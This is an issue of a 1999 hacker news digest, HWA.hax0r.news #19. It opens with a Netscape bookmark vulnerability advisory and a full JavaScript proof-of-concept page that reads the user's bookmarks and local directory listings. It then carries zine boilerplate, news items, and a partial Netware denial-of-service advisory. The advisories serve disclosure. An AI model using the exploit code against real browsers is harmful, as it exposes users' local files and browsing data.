security vulnerability There is a security bug in Netscape Communicator 4.51 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they handle special bookmarks with JavaScript code in the title. If you enclose a JavaScript code with <SCRIPT> tags in the <TITLE> tag and bookmark that page, the JavaScript code is written in the local bookmarks file. Then when the bookmarks file is open, the JavaScript code is executed in the security context of a local file - the bookmarks file. The bookmarks file may be open by a script, probably a server redirect or by the user. The bookmarks file name must be known, but it is easily guessed for most dialup users. Vulnerabilities: reading user's bookmarks, browsing local directories, reading local files (works fine on Linux, probably possible on Windows). Workaround: Disable JavaScript or do not bookmark untrusted pages. Demonstration is available at: http://www.nat.bg/~joro/book2.html See attached file for the source. Georgi Guninski http://www.nat.bg/~joro http://www.whitehats.com/guninski -------------------------------------------------------------------------- <http://www.nat.bg/~joro/book2.html> <HTML><HEAD> <TITLE> <SCRIPT> alert('Bookmarks got control'); s='Here are some bookmarks: \n'; for(i=1;i<7;i++) s += document.links[i]+'\n'; alert(s); dirToRead='wysiwyg://2/file://c:/'; a=window.open(dirToRead); s='Here are some files in C:\\ :\n'; for(i=1;i<7;i++) s += a.document.links[i]+'\n'; a.close(); alert(s); </SCRIPT>

HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 19 Volume 1 1999 May 22nd 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "If hackers ran the world, there'd be no war--lots of accidents, maybe." -Anon. Synopsis --------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #19 =-----------------------------------------------------------------------= ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #19 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. NMRC Advisory, DoS with Netware 4.x's TTS........................ 04.0 .. CA's InoculateIT for Windows NT v4.53 only scans inboxes......... 04.1 .. CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4 05.0 .. [ISN] Everywhere your MAC address shows up....................... 06.0 .. [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs.............. 07.0 .. INNdstart 2.0 vulnerability, possible root compromise............ 08.0 .. Sunsolve Database leaks crucial information...................... 09.0 .. [ISN] Asia is wide open to virus, hacker attacks................. 10.0 .. More on Zyklon's legal troubles.................................. 11.0 .. IRC war and a Police HQ bomb threat send two headed for trouble.. 12.0 .. UK Labels Windows as 'secure'.................................... 13.0 .. Yugoslavia to stay plugged in.................................... 14.0 .. VISA Releases Draft Protection Profile .......................... 15.0 .. cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities...... 15.1 .. cgichk.pl PERL version of the above cgi scanner from Wiltered Fire 16.0 .. Vulnerability in Netscape bookmarks found by George Guninski..... 17.0 .. Lotus Notes in bed with the NSA on encryption keys............... 18.0 .. Packetstom Security Gets the choke order for .yu sites........... 19.0 .. Common Trojans and the ports they can be found on................ 20.0 .. Fts_read vulnerabilty provides root compromise in FreeBSD find, du 21.0 .. Excel Macro Virus protection patch has a hole.................... 22.0 .. Possible root compromise when installing new SSHD................ 23.0 .. Apple's AtEase 5.0 security hole................................. 24.0 .. Bug in Microsoft Outlook Express................................. 25.0 .. Trivial buffer overflow DoS on WinAMP 2.x........................ 26.0 .. DISA Limits network activity..................................... 27.0 .. Money in the bank is an intangible?.............................. 28.0 .. r00tfest is May 21st to 23rd, and promises to be a big success... 29.0 .. heh.pl creates a number of rootshells in /tmp and disguises itself 30.0 .. RedHat6.0 fixes available for some current vulnerabilities........ 31.0 .. BisonWare FTP server vulnerabilities can lead to root compromise.. 32.0 .. Key Escrow revisited (who are the real criminals here??).......... 33.0 .. AOL Under Siege by Hackers, NOT! ................................. 34.0 .. Unknown spammer gets sued......................................... 35.0 .. German police crack down on internet crime........................ 36.0 .. After a rather long hiatus BoW resurfaces and releases issue #9... 37.0 .. AntiOnline opens up its knowledge database to the pheds........... 38.0 .. [ISN] RAID99 Hosted by CERIAS Call for papers..................... 39.0 .. Cryptogram May 15th'99............................................ 40.0 .. [ISN] Why i'm a security pessimist................................ 41.0 .. Bombs Off The Net!................................................ 42.0 .. Dark Spyre may end up in jail..................................... 43.0 .. ACTINIC ecommerce package claims to be 'unhackable'............... 44.0 .. MP3's off the net?................................................ 45.0 .. Free DNS! finally a network picks up the pieces from ml.org ...... 46.0 .. pIRCHCrack cracks password in pirch.ini files..................... 47.0 .. NASA vulnerable to attack......................................... 48.0 .. Vermont's Security Compromised ................................... 49.0 .. NIST May Be Named Info Security Clearing House ................... 50.0 .. 097M.Tristate Macro Virus Contained .............................. 51.0 .. "Hackers" Ruin Online Poll ....................................... 52.0 .. DSC v1.01 Released new ezine hits the electronic stands........... 53.0 .. Laser Pointers Illegal? .......................................... 54.0 .. Exploiting NT buffer overruns..................................... 55.0 .. More on biometrics from ZDNET..................................... =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls .......................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://axon.jccc.net/hir/ Hackers Information Report Link http://net-security.org Net Security Link http://www.403-security.org Daily news and security related site Link Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe, visit http://www.counterpane.com/unsubform.html.� Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.� He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest�� Sun� 14 Feb, 1999�� Volume 11 : Issue 09 �� ISSN� 1004-042X �� Editor: Jim Thomas (cudigest@sun.soci.niu.edu) �� News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) �� Archivist: Brendan Kehoe �� Poof Reader:�� Etaion Shrdlu, Jr. �� Shadow-Archivists: Dan Carosone / Paul Southworth �� Ralph Sims / Jyrki Kuoppala �� Ian Dickinson �� Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security Shouts to tekz from HK for asking nicely in eye-are-see! ;-) and to t4ck for making my night albeit I couldn't stick around for the rest of the comedy routine. hacked star dot star with phf huh? .... ;-)) and the #innerpulse, crew and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ FREE KEVIN Demonstrations Go WorldWide From HNN http://www.hackernews.com/ contributed by Macki With demonstrations now scheduled in front of the US Embassy in Russia the FREE KEVIN movement goes World Wide. Kevin Mitnick has been held in pretrial detention since February 15, 1995, without a constitutionally guaranteed bail hearing for possession of software allegedly worth millions of dollars. Protest demonstrations are now being planned around the world for Friday, June 4 in front of federal courthouses and U.S. embassies beginning at 2 pm to protest the unjust treatment of Kevin Mitnick. If there is a protest in your city please attend. If there is not please organize one. The government must be shown that the people will not sit idly by while their rights are trampled! FREE KEVIN Demonstrations http://www.2600.com/demo/index.html ++ OpenBSD 2.5 From HNN http://www.hackernews.com/ contributed by Weld Pond OpenBSD, a Free UNIX variant that places emphasis on portability, standardization, correctness, security, and cryptography, has just been upgraded to version 2.5. OpenBSD is a multiplatform and ultrasecure operating system. HNN uses it, shouldn't you? "OpenBSD: Sending the Kiddies to /dev/null since 1992" openbsd.org http://www.openbsd.org/ Amazon.com- Reserve Your Copy Today! http://www.amazon.com/exec/obidos/ASIN/0968363733/hackernewsnet ++ Chinese attacks on U.S computers From http://www.net-security.org/ CHINESE HACKERS RAID U.S. COMPUTERS by LucasAr, Monday 17th May 1999 on 4:30 pm CET Chinese hackers have attacked U.S. government information systems, including the White House network, in response to the errant bombingof the Chinese Embassy in Yugoslavia, according to an FBI report. ++ Just found this on the net, on Discovery Online no less, it has a (short) Hacker's Hall of Fame list with mini-bios of the featured hackers. - Ed http://www.discovery.com/area/technology/hackers/stallman.html ++ MIT Pulls R2-D2 Hack From HNN http://www.hackernews.com/ contributed by Code Kid Arguably the place where the word Hacker was coined,MIT students have turned the Great Dome into a giant R2-D2. For those of you who have been dead for the last seven years R2-D2 is a android from the Star Wars movie series. The hack consisted of covering the dome in red, white, blue, and black mesh-fabric panels. The hackers left a dozen doughnuts and instructions on how to remove the display. The Great Dome has been a popular place for Hacks in the past. Some of the better known ones have transformed the Dome into a Breast, a Pumpkin, or have placed a Police Crusier replica on the top. MIT Hack Gallery - Pictures Here http://hacks.mit.edu/Hacks/Gallery.html Wired http://www.wired.com/news/news/culture/story/19743.html ++ Scanner profiteer busted From HNN http://www.hackernews.com/ Scanner Profiteer contributed by erewhon Eric Ford, 27, of Studio City, CA, has pleaded guilty of recording and then selling the contents of a cellular phone call he listened to with a modified police scanner.The conversation was "marital squabble" that took place between Tom Cruise and Nicole Kidman. After parts of the conversation appeared in tabloids the couple contacted the FBI to start an investigation. The perpetrator was sentenced by a federal judge to six months in jail, 150 hours of community service and fined $3,000. APB Online http://www.apbonline.com/911/1999/05/17/cruise0517_01.html ++ Internet Set Free in Canada From HNN http://www.hackernews.com/ contributed by blsonne The Canadian Radio-television and Telecommunications Commission (CRTC) agreed on Monday that it will not regulate new media services on the Internet. After concluding that new media services are vibrant, highly competitive and successful without regulation, the CRTC has decided not to impose new rules on the internet so as to not hinder Canada in the global marketplace. CRTC http://www.crtc.gc.ca/ENG/NEWS/RELEASES/1999/R990517e.htm ++ Fujitsu Victim of Password Stealing Virus From HNN http://www.hackernews.com/ contributed by 0yK0t InfoWeb, Fujitsu Ltd.'s Internet service, has become the victim of an email virus designed to steal users passwords. The email claims that users are at risk from a new virus and should run the enclosed attachment as a precaution. The attachment then steals users passwords and emails them to a separate address. G-Search Ltd., a Fujitsu affiliate, says that at least 68 people received the virus/attachment. And once again this virus only effects Windows users. AsiaBizTech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/70448 Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ No mail for sharing this week! ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * Issue #19 'w00t' * * * * * * * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 03.0 Novell Netware buffer overflow in TTS (Transaction Tracking System) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 12 May 1999 14:18:59 -0500 From: Simple Nomad To: BUGTRAQ@netspace.org Subject: DoS with Netware 4.x's TTS _______________________________________________________________________________ Nomad Mobile Research Centre A D V I S O R Y www.nmrc.org Simple Nomad [thegnome@nmrc.org] 12May1998 _______________________________________________________________________________ Platform : Netware 4.x Application : NDS Severity : High Synopsis -------- It is possible to overflow the Transaction Tracking System (TTS) built into Novell Netware and possibly crash multiple servers. Tested configuration -------------------- The testing was done with the following configuration: Netware 4.11, Service Pack 5B Also confirmed on Netware 4.1. All systems had 64MB RAM and 1 GB drive space. Bug(s) report ------------- The Transaction Tracking System (TTS) is used by Novell Netware to help preserve the integrity of data during a system crash. If a transaction is in the process of being written to the hard drive when the system crashes, upon reboot the partial transaction is backed out preserving the integrity of the original data. Administrators can optionally flag a file with the TTS flag to add this protection (typically done with databases, especially those that have no rollback features). TTS by default tracks 10,000 transactions, and each instance uses a small amount of memory. If a burst of transactions are sent to the server and the available memory is exhausted, TTS will disable. While TTS is disabled, no updates can be made to Netware Directory Services. This can impact any program or process that updates NDS, such as login. In extreme overrun cases, such as very large simultaneous (or near simultaneous, actually) transactions, memory will be depleted quick enough to crash the server. This is not entirely uncommon, as any large burst of traffic updating NDS will cause the problem, such as bringing up a server after several days of downtime that has a Directory Services replica on it. Normally this can be corrected by increasing RAM or lowering the amount of transactions tracked >from the maximum default of 10,000 down to say 5,000 by issuing the command SET MAXIMUM TRANSACTIONS = 5000 at the console or via ServMan, and enabling TTS by typing ENABLE TTS at the console. However, a malicious user with proper access can force the memory depletion and potentially crash a server that has a replica of the NDS database. This can lead to multiple near-simultaneous server crashes. Of course anyone 